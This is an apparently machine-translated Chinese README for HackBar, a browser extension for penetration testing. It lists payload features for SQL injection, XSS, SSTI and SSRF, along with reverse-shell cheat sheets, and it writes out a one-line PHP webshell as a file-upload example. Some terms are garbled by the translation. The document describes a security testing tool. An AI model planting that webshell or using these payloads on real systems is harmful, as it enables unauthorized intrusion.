HackBar：一个用于渗透测试的浏览器扩展

获取

可在Chrome 网上应用店和Firefox 附加组件中获取。

请求的权限

• 贮存
  • 保存主题首选项
• 脚本编写
  • 执行POST请求
  • 运行测试功能
• 网络请求
  • 记住请求信息
  • 监听完成事件以进行清理
• 声明式网络请求
  • 根据设置设置 HTTP 标头值

特征

• 加载
  • 来自选项卡（默认）
  • 来自 cURL 命令
• 支持的
  • HTTP 方法
    • 得到
    • 邮政
      • 应用程序/x-www-form-urlencoded
      • 多部分/表单数据
      • 应用程序/json
  • 请求编辑模式
    • 基本的
    • 生的
  • 自定义负载
• 自动测试
  • 通用路径（包括来自dirsearch的单词列表）
• SQLi
  • 转储所有数据库名称（MySQL、PostgreSQL）
  • 从数据库转储表（MySQL、PostgreSQL、SQLite）
  • 从数据库转储列（MySQL、PostgreSQL、SQLite）
  • 联合选择语句（MySQL、PostgreSQL、SQLite）
  • 基于错误的注入语句（MySQL、PostgreSQL）
  • 一次性转储有效负载(MySQL)
  • 转储当前查询有效负载(MySQL)
  • 内嵌评论的空间
• 跨站脚本攻击
  • Vue.js XSS 有效负载
  • 用于严格 CSP 的 Angular.js XSS 有效负载
  • CTF的一些片段
  • 使用十六进制/十进制/实体名称进行 Html 编码/解码
  • String.fromCharCode 编码/解码
• 线性FI
  • PHP 包装器 – Base64
• SSRF
  • AWS – IAM 角色名称
• SSTI
  • Jinja2 SSTI
    • 《从 Flask 配置到 RCE》参考
  • Java SSTI
• 壳
  • Python 反向 shell 备忘单
  • sh(bash) 反向 shell 备忘单
  • nc(ncat) 反向 shell 备忘单
  • PHP webshel​​l/反向 shell 备忘单
• 编码
  • URL编码/解码
  • Base64 编码/解码
  • 十六进制编码/解码
  • Unicode 编码/解码
  • 使用十六进制/八进制转义 ASCII
• 散列
  • MD5
  • SHA1
  • SHA256
  • SHA3​​84
  • SHA512

用法

如何打开它？

1. 打开开发者工具（按F12或Ctrl + Shift + I）
2. 切换到HackBar选项卡
3. 好好享受

快捷方式

描述	捷径
加载	Alt + A
分裂	Alt + S
执行	Alt + X
模式	Alt + M

请求编辑

基本模式

多部分/表单数据

将enctype字段更改为 后multipart/form-data，您可以将有效负载放入Body字段，如下所示：

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

我们将把第一行作为边界，并重建一个表单元素来发送您的请求。

因此，发送的边界将与您输入的边界不同。

应用程序/json

将enctype字段更改为 后application/json，您可以将有效负载放入Body字段，如下所示：

{
  "username": "admin",
  "password": "admin"
}

如果您的有效负载不包含=：

为了发布 JSON 数据，我们将在您的 JSON 中插入一个虚拟字段或对象，如下所示：

{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }

有关更多详细信息，请访问“使用 HTML 表单发布 JSON ”。

原始模式

该模式是通过fetchAPI实现的。它会尽力发送与您输入的请求相同的请求。

但是，也有一些限制：

要求

• 无法使用指定的HTTP协议版本。协议版本HTTP/1.1在编辑器中是固定的，但请求中使用的版本取决于fetch行为。
• 即使您没有将某些 HTTP 标头添加到编辑器中，它们也可能会出现在发送的请求中。
  例如Connection、Cache-Control、Pragma等这些标头将被分配一个默认值。例如，Connection: keep-alive, Cache-Control: no-cache。

回复

• [Chrome] 它总是显示HTTP/1.1所使用的协议版本是否高于或等于 HTTP/2。另请参阅Chromium 代码搜索

项目地址：